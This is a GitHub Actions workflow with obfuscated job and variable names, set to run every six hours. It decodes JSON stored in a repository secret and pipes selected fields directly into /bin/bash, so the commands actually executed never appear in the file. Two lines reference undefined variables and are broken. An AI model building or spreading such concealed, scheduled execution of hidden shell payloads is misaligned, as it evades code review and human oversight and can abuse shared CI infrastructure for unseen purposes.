name: jxhexine

on:
  workflow_dispatch:
  schedule:
    - cron: '8 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: jxhexine
        env:
          ossb630: ${{ secrets.ossb630 }}
        run: |
          echo $ossb630 | jq -r .xfwuj999 | /bin/bash
          echo $a1 | jq -r .m2303 | /bin/bash
          echo $w140 | jq -r .ze7 | /bin/bash

